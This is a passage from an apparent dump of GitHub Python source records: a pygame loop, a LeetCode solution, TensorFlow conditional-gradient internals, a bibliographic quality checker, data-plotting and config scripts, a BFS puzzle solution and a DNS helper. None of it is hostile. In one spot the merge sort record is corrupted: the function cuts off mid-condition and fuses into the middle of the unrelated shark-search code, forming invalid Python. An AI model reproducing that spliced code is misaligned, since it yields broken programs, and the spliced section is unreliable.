frame\n\tscreen.fill(\"black\")\n\n \t# event loop\n\tscreen.blit(SYS_IMAGES['lock'], (0,0), screen.get_rect())\n\tfor event in pygame.event.get():\n\t\tif event.type == pygame.QUIT:\n\t\t\tpygame.quit()\n\t\t\tsys.exit()\n\t\telif event.type == pygame.VIDEORESIZE:\n\t\t\tscreen = pygame.display.set_mode((event.w, event.h), pygame.RESIZABLE)\n\t\t\tSYS_IMAGES['lock'] = pygame.transform.scale(SYS_IMAGES['lock'], (event.w, event.h))\n\n\tif dt > 0 and 
MACHINE_SETTINGS['display_fps']:\n\t\twriteText(screen, 'VictorMono/VictorMono-Regular', f'{round(1/dt)} FPS', 0, 0, (255, 255, 255), 12, (64, 64, 64))\n\n\tpygame.display.flip()\n\n\t# frame clock ticking\n\tdt = clock.tick(frames_per_second) / 1000","repo_name":"Rexxt/DhilltOS-pygame","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"33402242843","text":"\"\"\"11. Container With Most Water\nhttps://leetcode.com/problems/container-with-most-water/\nYou are given an integer array height of length n. \nThere are n vertical lines drawn such that the two endpoints of the ith line are (i, 0) and (i, height[i]).\n\nFind two lines that together with the x-axis form a container, such that the container contains the most water.\n\nReturn the maximum amount of water a container can store.\n\"\"\"\n\nfrom typing import List\n\n\nclass Solution:\n def maxArea(self, height: List[int]) -> int:\n l_idx = 0\n r_idx = len(height) - 1\n area = 0\n\n while l_idx < r_idx:\n new_area = (r_idx - l_idx) * min(height[l_idx], height[r_idx])\n area = max(area, new_area)\n if height[l_idx] < height[r_idx]:\n l_idx += 1\n else:\n r_idx -= 1\n return area\n\n\nif __name__ == \"__main__\":\n assert Solution().maxArea([1, 8, 6, 2, 5, 4, 8, 3, 7]) == 49\n","repo_name":"iKintosh/algorithms_in_python","sub_path":"src/leetcode/max_area.py","file_name":"max_area.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"73958117967","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom tensorflow.core.framework import attr_value_pb2\nfrom tensorflow.python import pywrap_tensorflow as c_api\nfrom tensorflow.python.framework import c_api_util\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops import control_flow_util\nfrom tensorflow.python.ops import gen_functional_ops\nfrom tensorflow.python.util import compat\n\n\n# The following modules cannot be imported directly because they cause circular\n# dependencies. These are set in each corresponding module.\n_function = None\n_function_def_to_graph = None\n_gradients_impl = None\n\n# NOTE(skyewm): TensorFlow uses protected class methods and fields to signify\n# that they aren't part of the official public API. These protected members\n# often need to be used by implementation code however. 
Rather than litter the\n# code with pylint comments, we ignore protected access violations for\n# readability.\n# pylint: disable=protected-access\n\n\ndef cond_v2(pred, true_fn, false_fn, name=\"cond\"):\n \"\"\"Like tf.cond, except emits a single If op.\"\"\"\n if not name:\n name = \"cond\"\n\n with ops.name_scope(name) as scope:\n # Identify if there is a caller device, & get the innermost if possible.\n device_stack = ops.get_default_graph()._device_function_stack\n caller_device = device_stack[-1] if device_stack else None\n\n caller_colocation_stack = ops.get_default_graph()._colocation_stack\n caller_container = ops.get_default_graph()._container\n caller_collection_ref = ops.get_default_graph()._collections\n\n func_name_prefix = scope.replace(\"/\", \"_\")\n\n true_graph = _function.func_graph_from_py_func(\n true_fn, [], [],\n name=\"%strue\" % func_name_prefix,\n device=caller_device,\n colocation_stack=caller_colocation_stack,\n collections_ref=caller_collection_ref,\n container=caller_container)\n false_graph = _function.func_graph_from_py_func(\n false_fn, [], [],\n name=\"%sfalse\" % func_name_prefix,\n device=caller_device,\n colocation_stack=caller_colocation_stack,\n collections_ref=caller_collection_ref,\n container=caller_container)\n _check_same_outputs(true_graph, false_graph)\n\n # Add inputs to true_graph and false_graph to make them match. Note that\n # this modifies true_graph and false_graph.\n cond_inputs = _make_inputs_match(true_graph, false_graph,\n true_graph.extra_inputs,\n false_graph.extra_inputs)\n\n # Add all intermediate tensors as function outputs so they're available for\n # the gradient computation.\n\n true_intermediates = _get_intermediates(true_graph)\n false_intermediates = _get_intermediates(false_graph)\n\n # Save the original number of outputs to return to the caller.\n num_cond_outputs = len(true_graph.outputs)\n\n # Make the number/type of new intermediate outputs match.\n extra_true_outputs, extra_false_outputs = _pad_params(\n true_graph, false_graph, true_intermediates, false_intermediates)\n\n true_graph.outputs.extend(extra_true_outputs)\n false_graph.outputs.extend(extra_false_outputs)\n\n # Create the If op.\n tensors = gen_functional_ops._if(\n pred, cond_inputs, [t.dtype for t in true_graph.outputs],\n _create_new_tf_function(true_graph),\n _create_new_tf_function(false_graph),\n name=scope)\n\n # Set the flag to enable lowering on the `if` op if necessary\n # Lowering allows cond_v2 to avoid some of the limitations of Functions,\n # allowing users to specify devices & colocation inside of cond_v2 branches,\n # and enabling non-strict evaluation & partial pruning of cond_v2 branches.\n # This brings cond_v2 closer to feature parity with tf.cond.\n #\n # However, we do not lower `If` in the XLA context because it is easier for\n # XLA to apply its own optimizations when dealing with un-lowered `If`\n # operators than with lowered switch/merge control flow.\n #\n # TODO(b/110167197) this approach requires cond_v2 to have at least 1 output\n if_op = tensors[0].op\n if not control_flow_util.IsInXLAContext(if_op):\n if_op._set_attr(\"_lower_using_switch_merge\",\n attr_value_pb2.AttrValue(b=True))\n\n return tensors[:num_cond_outputs]\n\n\n@ops.RegisterGradient(\"If\")\ndef _IfGrad(op, *grads): # pylint: disable=invalid-name\n \"\"\"The gradient of an If op produced by cond_v2.\"\"\"\n true_graph, false_graph = _get_func_graphs(op)\n\n # Create grad functions that compute the gradient of the true/false forward\n # graphs. 
These functions will capture tensors from the forward pass\n # functions.\n true_grad_graph = _create_grad_func(\n true_graph, grads, _get_grad_fn_name(true_graph))\n false_grad_graph = _create_grad_func(\n false_graph, grads, _get_grad_fn_name(false_graph))\n\n assert ([t.dtype for t in true_grad_graph.outputs] ==\n [t.dtype for t in false_grad_graph.outputs])\n\n # Match up the captured grad function inputs with outputs of 'op' and other\n # external tensors.\n true_grad_inputs = _get_grad_inputs(op, true_graph, true_grad_graph)\n false_grad_inputs = _get_grad_inputs(op, false_graph, false_grad_graph)\n\n # Make the inputs to true_grad_graph and false_grad_graph match. Note that\n # this modifies true_grad_graph and false_grad_graph.\n grad_inputs = _make_inputs_match(true_grad_graph, false_grad_graph,\n true_grad_inputs, false_grad_inputs)\n\n # Add all intermediate tensors as function outputs so they're available for\n # higher-order gradient computations.\n\n true_grad_intermediates = _get_intermediates(true_grad_graph)\n false_grad_intermediates = _get_intermediates(false_grad_graph)\n\n # Save the original number of gradient outputs to return.\n num_grad_outputs = len(true_grad_graph.outputs)\n\n # Make the number/type of new intermediate outputs match.\n extra_true_grad_outputs, extra_false_grad_outputs = _pad_params(\n true_grad_graph, false_grad_graph,\n true_grad_intermediates, false_grad_intermediates)\n\n true_grad_graph.outputs.extend(extra_true_grad_outputs)\n false_grad_graph.outputs.extend(extra_false_grad_outputs)\n\n # Create the gradient If op.\n tensors = gen_functional_ops._if(\n op.inputs[0], grad_inputs, [t.dtype for t in true_grad_graph.outputs],\n _create_new_tf_function(true_grad_graph),\n _create_new_tf_function(false_grad_graph))\n\n # The predicate has no gradient.\n return [None] + tensors[:num_grad_outputs]\n\n\ndef _get_func_graphs(if_op):\n \"\"\"Returns `_FuncGraph`s for the input op branches.\n\n Args:\n if_op: The _If Operation.\n\n Returns:\n A 2-tuple of the `_FuncGraph`s of the then_branch and else_branch.\n \"\"\"\n def _get_func_graph_for_branch(branch_name):\n \"\"\"Generates and returns a _FuncGraph for the given branch.\"\"\"\n extra_inputs = if_op.inputs[1:] # First input is pred.\n input_shapes = [t.shape for t in extra_inputs]\n func_name = if_op.get_attr(branch_name).name\n fdef = if_op.graph._get_function(func_name).definition\n func_graph = _function_def_to_graph.function_def_to_graph(\n fdef, input_shapes)\n func_graph.extra_inputs = extra_inputs\n func_graph.extra_args = func_graph.inputs\n func_graph._captured = dict(zip(extra_inputs, func_graph.inputs))\n return func_graph\n\n return (_get_func_graph_for_branch(\"then_branch\"),\n _get_func_graph_for_branch(\"else_branch\"))\n\n\ndef _grad_fn(func_graph, grads):\n \"\"\"The gradient function for each conditional branch.\n\n This function builds the gradient graph of the corresponding forward-pass\n conditional branch in `func_graph`. This is done by differentiating\n func_graph's outputs w.r.t. its inputs.\n\n Args:\n func_graph: function._FuncGraph. The corresponding forward-pass function.\n grads: The list of input gradient Tensors.\n\n Returns:\n The output gradient Tensors.\n \"\"\"\n # Filter out untrainable function outputs.\n # NOTE(skyewm): If we don't do this, the untrainable tensors can sometimes\n # cause _GradientsHelper to raise an exception (e.g. 
the implementation\n # doesn't expect 'ys' to contain boolean tensors).\n assert len(func_graph.outputs) == len(grads)\n ys = []\n grad_ys = []\n for y, grad_y in zip(func_graph.outputs, grads):\n if not _gradients_impl._IsTrainable(y):\n continue\n ys.append(y)\n grad_ys.append(grad_y)\n\n # Build the gradient graph. Note that this builds the gradient computation of\n # func_graph in the current graph, which requires capturing tensors from\n # func_graph. The captured func_graph tensors are resolved to external tensors\n # in _get_grad_inputs.\n result = _gradients_impl._GradientsHelper(\n ys, func_graph.inputs, grad_ys=grad_ys,\n src_graph=func_graph)\n\n # Functions can't return None; replace Nones with zero tensors.\n # TODO(b/80444525): don't return anything here and make _IfGrad return None if\n # both branches have zero gradient.\n for i in range(len(result)):\n if result[i] is None:\n result[i] = array_ops.zeros_like(func_graph.inputs[i])\n\n return result\n\n\ndef _create_grad_func(func_graph, grads, name):\n \"\"\"Returns the _FuncGraph representation of _grad_fn.\"\"\"\n return _function.func_graph_from_py_func(lambda: _grad_fn(func_graph, grads),\n [], [], name)\n\n\ndef _get_grad_inputs(if_op, cond_graph, grad_graph):\n \"\"\"Returns the tensors we should pass to grad_graph.\n\n This method handles tensors captured from cond_graph in grad_graph. It\n converts these to suitable input tensors from the outer graph.\n\n Args:\n if_op: Operation. The forward-pass If op that uses cond_graph.\n cond_graph: function._FuncGraph. The forward-pass function.\n grad_graph: function._FuncGraph. The gradients function.\n\n Returns:\n A list of inputs tensors to be passed to grad_graph.\n \"\"\"\n inputs = []\n\n # Maps placeholders in cond_graph -> input tensor in outer graph.\n forward_input_map = {v: k for k, v in cond_graph._captured.items()}\n\n for t in grad_graph.extra_inputs:\n if t.graph == ops.get_default_graph():\n # t is in the outer graph (e.g. one of the input gradients).\n inputs.append(t)\n elif t in forward_input_map:\n # t is an input placeholder in cond_graph. Get the corresponding input\n # tensor in the outer graph.\n assert t.graph == cond_graph\n assert forward_input_map[t].graph == ops.get_default_graph()\n inputs.append(forward_input_map[t])\n else:\n # t is an intermediate value in cond_graph. 
Get the corresponding output\n # of 'if_op' (note that all intermediate values are outputs).\n assert t.graph == cond_graph\n output_idx = cond_graph.outputs.index(t)\n inputs.append(if_op.outputs[output_idx])\n\n return inputs\n\n\ndef _create_new_tf_function(func_graph):\n \"\"\"Converts func_graph to a TF_Function and adds it to the current graph.\n\n Args:\n func_graph: function._FuncGraph\n\n Returns:\n The name of the new TF_Function.\n \"\"\"\n c_func = c_api.TF_GraphToFunction_wrapper(\n func_graph._c_graph,\n compat.as_str(func_graph.name),\n False, # append_hash_to_fn_name\n None, # opers\n [t._as_tf_output() for t in func_graph.inputs],\n [t._as_tf_output() for t in func_graph.outputs],\n [],\n None, # opts\n None) # description\n _ = c_api_util.ScopedTFFunction(c_func)\n\n # TODO(b/109833212): this sucks, we're serializing the TF_Function*,\n # deserializing it into a Python FunctionDef, then reserializing it to create\n # a new TF_Function that we add to the graph.\n fdef = _function.function_def_from_tf_function(c_func)\n defined_func = _function._from_definition(fdef)\n defined_func.add_to_graph(ops.get_default_graph())\n\n return func_graph.name\n\n\ndef _get_intermediates(func_graph):\n \"\"\"Returns all tensors in `func_graph` that aren't inputs or outputs.\"\"\"\n intermediates = []\n for op in func_graph.get_operations():\n for t in op.outputs:\n if t in func_graph.inputs: continue\n if t in func_graph.outputs: continue\n intermediates.append(t)\n return intermediates\n\n\ndef _separate_unique_inputs(true_inputs, false_inputs):\n \"\"\"Separates tensors appearing only in true_inputs or false_inputs, or both.\n\n Args:\n true_inputs: list of Tensors\n false_inputs: list of Tensors\n\n Returns:\n Three lists of Tensors:\n 1. The tensors that appear in both true_inputs and false_inputs\n 2. The tensors that only appear in true_inputs\n 3. The tensors that only appear in false_inputs\n \"\"\"\n true_inputs = set(true_inputs)\n false_inputs = set(false_inputs)\n\n shared_inputs = true_inputs.intersection(false_inputs)\n true_only_inputs = true_inputs - false_inputs\n false_only_inputs = false_inputs - true_inputs\n\n return list(shared_inputs), list(true_only_inputs), list(false_only_inputs)\n\n\ndef _pad_params(true_graph, false_graph, true_params, false_params):\n \"\"\"Returns new param lists that have matching signatures.\n\n This is done by mirroring each param list in the other using dummy params.\n There is no merging of params.\n\n Args:\n true_graph: function._FuncGraph\n false_graph: function._FuncGraph\n true_params: a list of Tensors from true_graph\n false_params: a list of Tensors from false_graph\n\n Returns:\n A new list of Tensors in true_graph and a new list of Tensors in\n false_graph. The two lists have the same number of Tensors, with matching\n types and shapes across the lists.\n \"\"\"\n new_true_params = (true_params +\n _create_dummy_params(true_graph, false_params))\n new_false_inputs = (_create_dummy_params(false_graph, true_params)\n + false_params)\n return new_true_params, new_false_inputs\n\n\ndef _make_inputs_match(true_graph, false_graph, true_inputs, false_inputs):\n \"\"\"Modifies true_graph and false_graph so they have the same input signature.\n\n This method reorders and/or adds parameters to true_graph and false_graph so\n they have the same input signature, and updates the 'inputs', 'extra_inputs',\n and '_captured' fields of both graphs accordingly. 
It uses the input tensors\n from the outer graph to avoid duplicating shared arguments.\n\n Args:\n true_graph: function._FuncGraph\n false_graph: function._FuncGraph\n true_inputs: a list of Tensors in the outer graph. The inputs for\n true_graph.\n false_inputs: a list of Tensors in the outer graph. The inputs for\n false_graph.\n\n Returns:\n A new list of Tensors from the outer graph that are the new inputs for both\n true_graph and false_graph. This is a deduped version of true_inputs +\n false_inputs.\n \"\"\"\n shared_inputs, true_only_inputs, false_only_inputs = _separate_unique_inputs(\n true_inputs, false_inputs)\n\n new_inputs = shared_inputs + true_only_inputs + false_only_inputs\n\n true_input_to_param = dict(zip(true_inputs, true_graph.inputs))\n false_input_to_param = dict(zip(false_inputs, false_graph.inputs))\n\n true_graph.inputs = (\n [true_input_to_param[t] for t in shared_inputs] +\n [true_input_to_param[t] for t in true_only_inputs] +\n _create_dummy_params(true_graph, false_only_inputs))\n\n false_graph.inputs = (\n [false_input_to_param[t] for t in shared_inputs] +\n _create_dummy_params(false_graph, true_only_inputs) +\n [false_input_to_param[t] for t in false_only_inputs])\n\n # Rewrite the _FuncGraphs' state to reflect the new inputs.\n true_graph.extra_inputs = new_inputs\n false_graph.extra_inputs = new_inputs\n\n true_graph._captured = dict(zip(new_inputs, true_graph.inputs))\n false_graph._captured = dict(zip(new_inputs, false_graph.inputs))\n\n return new_inputs\n\n\ndef _create_dummy_params(func_graph, template_tensors):\n \"\"\"Creates tensors in func_graph to represent template_tensors.\n\n Args:\n func_graph: function._FuncGraph.\n template_tensors: a list of tensors in the outer graph.\n\n Returns:\n A list of tensors in func_graph.\n \"\"\"\n with func_graph.as_default():\n return [gen_functional_ops.fake_param(dtype=t.dtype, shape=t.shape)\n for t in template_tensors]\n\n\ndef _get_grad_fn_name(func_graph):\n \"\"\"Returns a unique name to use for the grad function of `func_graph`.\"\"\"\n name = \"%s_grad\" % func_graph.name\n\n base_name = name\n counter = 1\n if ops.get_default_graph()._is_function(name):\n name = \"%s_%s\" % (base_name, counter)\n counter += 1\n\n return name\n\n\ndef _check_same_outputs(true_graph, false_graph):\n \"\"\"Raises an error if true_graph and false_graph have different outputs.\"\"\"\n true_output_types = [t.dtype for t in true_graph.outputs]\n false_output_types = [t.dtype for t in false_graph.outputs]\n if (len(true_graph.outputs) != len(false_graph.outputs) or\n true_output_types != false_output_types):\n raise ValueError(\n \"true_fn() and false_fn() must return the same number and type of \"\n \"arguments, got:\\n\"\n \" true_fn: %s\\n\"\n \" false_fn: %s\" % (true_output_types, false_output_types))\n","repo_name":"zylo117/tensorflow-gpu-macosx","sub_path":"tensorflow/tensorflow/python/ops/cond_v2_impl.py","file_name":"cond_v2_impl.py","file_ext":"py","file_size_in_byte":17067,"program_lang":"python","lang":"en","doc_type":"code","stars":101,"dataset":"github-code","pt":"65"} +{"seq_id":"16627967604","text":"#! 
/usr/bin/env python\n\"\"\"Checker for fields that are inconsistent with the ENTRYTYPE.\"\"\"\nfrom __future__ import annotations\n\nimport colrev.qm.quality_model\nfrom colrev.constants import DefectCodes\nfrom colrev.constants import Fields\n\n# pylint: disable=too-few-public-methods\n\n\nclass InconsistentWithEntrytypeChecker:\n    \"\"\"The InconsistentWithEntrytypeChecker\"\"\"\n\n    record_field_inconsistencies: dict[str, list[str]] = {\n        \"article\": [Fields.BOOKTITLE, Fields.ISBN],\n        \"inproceedings\": [\"issue\", Fields.NUMBER, Fields.JOURNAL],\n        \"incollection\": [],\n        \"inbook\": [Fields.JOURNAL],\n        \"book\": [\"issue\", Fields.NUMBER, Fields.JOURNAL],\n        \"phdthesis\": [\n            Fields.VOLUME,\n            \"issue\",\n            Fields.NUMBER,\n            Fields.JOURNAL,\n            Fields.BOOKTITLE,\n            Fields.ISBN,\n        ],\n        \"masterthesis\": [\n            Fields.VOLUME,\n            \"issue\",\n            Fields.NUMBER,\n            Fields.JOURNAL,\n            Fields.BOOKTITLE,\n            Fields.ISBN,\n        ],\n        \"techreport\": [\n            Fields.VOLUME,\n            \"issue\",\n            Fields.NUMBER,\n            Fields.JOURNAL,\n            Fields.BOOKTITLE,\n            Fields.ISBN,\n        ],\n        \"unpublished\": [\n            Fields.VOLUME,\n            \"issue\",\n            Fields.NUMBER,\n            Fields.JOURNAL,\n            Fields.BOOKTITLE,\n            Fields.ISBN,\n        ],\n        \"online\": [Fields.JOURNAL, Fields.BOOKTITLE, Fields.ISBN],\n        \"misc\": [Fields.JOURNAL, Fields.BOOKTITLE, Fields.ISBN],\n    }\n    \"\"\"Fields considered inconsistent with the respective ENTRYTYPE\"\"\"\n\n    msg = DefectCodes.INCONSISTENT_WITH_ENTRYTYPE\n\n    def __init__(self, quality_model: colrev.qm.quality_model.QualityModel) -> None:\n        self.quality_model = quality_model\n\n    def run(self, *, record: colrev.record.Record) -> None:\n        \"\"\"Run the completeness checks\"\"\"\n\n        if record.data[\"ENTRYTYPE\"] not in self.record_field_inconsistencies:\n            return\n\n        inconsistent_fields = self.record_field_inconsistencies[\n            record.data[\"ENTRYTYPE\"]\n        ]\n        for key in record.data:\n            if key in inconsistent_fields:\n                record.add_masterdata_provenance_note(key=key, note=self.msg)\n            else:\n                record.remove_masterdata_provenance_note(key=key, note=self.msg)\n\n\ndef register(quality_model: colrev.qm.quality_model.QualityModel) -> None:\n    \"\"\"Register the checker\"\"\"\n    quality_model.register_checker(InconsistentWithEntrytypeChecker(quality_model))\n","repo_name":"CoLRev-Environment/colrev","sub_path":"colrev/qm/checkers/inconsistent_with_entrytype.py","file_name":"inconsistent_with_entrytype.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"65"} +{"seq_id":"13878147456","text":"import os\nfrom dotenv import load_dotenv\n\n\nload_dotenv()\n\n\nclass envLoader:\n    def __init__(self):\n        self.base = self.dir_name(3)\n\n    def dir_name(self, n):\n        path = os.path.abspath(__file__)\n        for _ in range(n): path = os.path.dirname(path)\n        return path\n\n    def get_path(self, env):\n        env_path = os.getenv(env)\n        return os.path.join(self.base, env_path) if os.getenv(env) else None\n\n    def path(self):\n        get = self.get_path\n        path = {\n            'csvs': get('csvs_path'),\n            'date': get('date_path'),\n            'syms': get('syms_path'),\n            'syms_lnth_path': get('syms_lnth_path'),\n            'data': get('data_path'),\n            'logs': get('logs_path'),\n            'prep': get('prep_path'),\n            'pred': get('pred_path'),\n            'test': get('test_path'),\n            'train': get('train_path'),\n            'result': get('result_path')\n        }\n
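        # Added note (not in the original): with dir_name now taking self, the\n        # call self.dir_name(3) climbs three directory levels up from this\n        # file; e.g. for a layout like /repo/src/Utils/envLoader.py it yields\n        # /repo, so the .env paths above resolve from the project root.\n        return 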
path","repo_name":"bee85919/pred-stock-with-gru","sub_path":"src/Utils/envLoader.py","file_name":"envLoader.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"22738108995","text":"import numpy as np\nimport pandas as pd\nimport openpyxl\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\n\n\n# Reading and Cleaning Data from Excel File\nURL = 'https://cf-courses-data.s3.us.cloud-object-storage.appdomain.cloud/IBMDeveloperSkillsNetwork-DV0101EN-SkillsNetwork/Data%20Files/Canada.xlsx'\ndf = pd.read_excel(\n URL,\n sheet_name='Canada by Citizenship',\n skiprows=range(20),\n skipfooter=2)\nprint('Data downloaded and read into a dataframe!')\npd.set_option('expand_frame_repr', None)\ndf.drop(['AREA', 'REG', 'DEV', 'Type', 'Coverage'], axis=1, inplace=True)\nprint(df.head())\ndf.rename(columns={'OdName':'Country', 'AreaName':'Continent','RegName':'Region'}, inplace=True)\nprint(df.head())\ndf.set_index('Country',inplace=True)\nprint(df.head())\nprint(df.loc['Morocco',:])\n# add total immigrants per country\ndf['Total'] = df.sum(axis=1)\nprint(df)\n# Plotting the top 10 countries with immigrants to Canada using a stacked Area plot\nYears=list(range(1980,2014))\nprint(Years)\ndf.sort_values(['Total'],ascending=False,inplace=True)\nprint(df.head(10))\ndf_sort=df.head(10)\ndf_sort=df_sort[Years].transpose()\nprint(df_sort)\n#df_sort.index=df_sort.index.map(int)\nprint(df_sort)\ndf_sort.plot(kind='area',figsize=(20,10))\nplt.title('Immigration Trend of Top 10 Countries')\nplt.ylabel('Number of Immigrants')\nplt.xlabel('Years')\nplt.show()\n# Plotting the least 10 countries with immigrants to Canada using a stacked Area plot\nYears_least=list(range(1980,2014))\nprint(Years_least)\ndf.sort_values(['Total'],ascending=True,inplace=True)\nprint(df.head(10))\ndf_sort_least=df.head(10)\ndf_sort_least=df_sort_least[Years].transpose()\nprint(df_sort_least)\n#df_sort.index=df_sort.index.map(int)\nprint(df_sort_least)\ndf_sort_least.plot(kind='area',figsize=(20,10))\nplt.title('Immigration Trend of Least 10 Countries')\nplt.ylabel('Number of Immigrants')\nplt.xlabel('Years')\nplt.show()","repo_name":"Zidev97/Canada-Immigration-Analysis","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"43941455571","text":"################################\n# Information about extraction #\n################################\n\n# Dictionary with lists of which columns to get for each table\nEXTRACT_DICT = {\n 'AboReg': ['RowKey', 'CustId', 'Name', 'Department', 'Addr2'],\n 'ElmOwner': ['RowKey', 'Owner', 'Name', 'Email', 'Type'],\n 'EndReg': ['RowKey', 'End', 'EqLinkToPt', 'IsEquipm'],\n 'KabReg': ['RowKey', 'Cable', 'End_A', 'End_B', 'Owner', 'RemarkM'],\n 'KabTer': ['RowKey', 'Cable', 'IsEnd_A', 'FromCore', 'End', 'IsDraft'],\n 'KuSbLink': ['RowKey', 'CustId', 'Circuit'],\n 'LedRut': ['RowKey', 'Cable', 'Core', 'Circuit', 'Wire', 'Remark'],\n 'SbReg': ['RowKey', 'Circuit', 'Type', 'Speed', 'Reference', 'Owner'],\n 'UtsTilk': ['RowKey', 'Pin', 'Port', 'End', 'Circuit', 'Wire'],\n 'UtsTlf': ['RowKey', 'Circuit', 'Parallel', 'End'],\n 'UtsUtg': ['RowKey', 'End', 'Port', 'Label', 'Remark', 'Type'],\n }\n\n# Single-column primary key for each table\nPREVIOUS_REGULAR_PRIMARY_KEYS = {\n}\n\n# Composite primary key for each table\nPREVIOUS_COMPOSITE_PRIMARY_KEYS = {\n 'UtsUtg': 
('Port', 'End')\n}\n\n# List of single-column foreign keys associated with each table\nREGULAR_FOREIGN_KEYS = {\n 'EndReg': ['EqLinkToPt'],\n 'KabReg': ['End_A', 'End_B'],\n 'KabTer': ['Cable', 'End'],\n 'LedRut': ['Cable', 'Circuit'],\n 'UtsTilk': ['Circuit'],\n 'UtsTlf': ['Circuit', 'End'],\n 'UtsUtg': ['End'],\n }\n\n# Mapping from column name to which model to use as foreign key\nCOLUMN_TO_OBJECT = {\n 'Cable': 'Cable',\n 'Circuit': 'Circuit',\n 'End': 'End',\n 'End_A': 'End',\n 'End_B': 'End',\n 'EqLinkToPt': 'End',\n}\n\n# List of composite foreign keys associated with each table\nCOMPOSITE_FOREIGN_KEYS = {\n 'UtsTilk': ['Port', 'End'],\n}\n\n# List of tables to be renamed with the new name\nNEW_TABLE_NAMES = {\n 'AboReg': 'customer',\n 'ElmOwner': 'owner',\n 'EndReg': 'end',\n 'KabReg': 'cable',\n 'KabTer': 'termination',\n 'KuSbLink': 'customer_circuit',\n 'LedRut': 'routing_cable',\n 'SbReg': 'circuit',\n 'UtsTilk': 'connection',\n 'UtsTlf': 'circuit_end',\n 'UtsUtg': 'port',\n}\n\n# Dict of new column names\nNEW_COLUMN_NAMES = {\n 'Addr2': 'address',\n 'Cable': 'cable',\n 'Circuit': 'circuit',\n 'Core': 'core',\n 'CustId': 'customer',\n 'Department': 'department',\n 'Email': 'email',\n 'End': 'end',\n 'End_A': 'end_a',\n 'End_B': 'end_b',\n 'EqLinkToPt': 'room',\n 'FromCore': 'from_core',\n 'IsDraft': 'is_draft',\n 'IsEnd_A': 'is_end_a',\n 'IsEquipm': 'is_equipment',\n 'Label': 'label',\n 'Name': 'name',\n 'Owner': 'owner',\n 'Pin': 'pin',\n 'Port': 'port',\n 'Parallel': 'parallel',\n 'Reference': 'alias',\n 'Remark': 'remark',\n 'RemarkM': 'comment',\n 'RowKey': 'id',\n 'Speed': 'speed',\n 'Type': 'type',\n 'Wire': 'wire',\n}\n\n# List of columns to be lowercased\nLOWERCASE_OBJECTS = ['End', 'Reference']\n\nSCHEMA = 'telemator'\n","repo_name":"Uninett/telemator-NAV-integrasjon","sub_path":"telemator_export/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"7137435166","text":"def MergeSort(arr):\n MergeSort2(arr, 0, len(arr)-1 )\n return arr\n\ndef MergeSort2(arr, first, last):\n if first= mat[a+1][b]:\n q.append((a+1,b,di+1))\n if b + 1 <= N-1 and ss >= mat[a][b+1]:\n q.append((a,b+1,di+1))\n if a - 1 >= 0 and ss >= mat[a-1][b]:\n q.append((a-1,b,di+1))\n if b - 1 >= 0 and ss >= mat[a][b-1]:\n q.append((a,b-1,di+1))\n\n if di == 0 :\n visit[a][b] = di+1\n else:\n visit[a][b] = di\n if ff == 1:\n distance = di\n else:\n distance = -1\n return distance\n\na,b = pos\nkkk = []\nvisit = copy.deepcopy(visit_t)\nfor i in range(len(tttt)):\n aa,bb=tttt[i]\n dis = find(mat, shark, a, b, aa, bb,visit)\n if dis > 0:\n kkk.append((dis,aa,bb))\naaa = bbb = -1\nkkk = sorted(kkk)\nif kkk:\n ccc,aaa,bbb = kkk[0]\nif aaa is not -1:\n fi.append((aaa,bbb))\n\nres = 0\ndef func(mat,r,c):\n global shark,res\n\n cnt = 0\n ccccc = 0\n while(fi):\n #print(fi)\n a, b = fi.popleft()\n flag = 0\n for i in range(N):\n for j in range(N):\n if shark - 1 >= mat[i][j] and mat[i][j] is not 0:\n flag = 1\n break\n\n if flag == 0:\n break\n #print(mat, shark, r, c, a, b,res)\n visit = copy.deepcopy(visit_t)\n ddd = find(mat, shark, r, c, a, b,visit)\n if ddd == -1:\n continue\n mat[a][b] = 0\n r = a\n c = b\n res += ddd\n cnt += 1\n if shark == cnt:\n shark += 1\n cnt = 0\n\n ttt=[]\n for i in range(N):\n for j in range(N):\n if shark-1 >= mat[i][j] and mat[i][j] is not 0:\n ttt.append((i,j))\n #print(ttt)\n kkk = []\n di = 0\n visit = copy.deepcopy(visit_t)\n for i in 
range(len(ttt)):\n            aa,bb=ttt[i]\n            di = find(mat, shark, r, c, aa, bb,visit)\n            if di > 0:\n                kkk.append((di,aa,bb))\n        #print(kkk)\n        kkk = sorted(kkk)\n        #print(kkk)\n        aaa = bbb = -1\n        if kkk:\n            ccc, aaa, bbb = kkk[0]\n        if aaa == -1:\n            continue\n        fi.append((aaa,bbb))\nr,c = pos\nmat[r][c] = 0\nfunc(mat,r,c)\nprint(res)\n","repo_name":"JoungChanYoung/algorithm","sub_path":"baekjoon/OldSource/16236_아기상어.py","file_name":"16236_아기상어.py","file_ext":"py","file_size_in_byte":3087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"15450188901","text":"# pylint: disable=invalid-name\nimport socket\nimport dns.resolver\nimport dns.reversename\n\n\ndef dns_query(qname, field):\n    dns_answers = None\n    dns_error = None\n    try:\n        dns_answers = dns.resolver.query(qname, field)\n    except dns.resolver.NXDOMAIN:\n        # ignore: The DNS query name does not exist.\n        dns_answers = None\n        dns_error = None\n    except dns.resolver.NoAnswer:\n        # ignore: The DNS response does not contain an answer to the question.\n        dns_answers = None\n        dns_error = None\n    except dns.resolver.NoNameservers:\n        # All nameservers failed to answer the query.\n        # dns_error='No non-broken nameservers are available to answer the question'\n        dns_answers = None\n        dns_error = None\n    except dns.exception.Timeout:\n        # The DNS operation timed out.\n        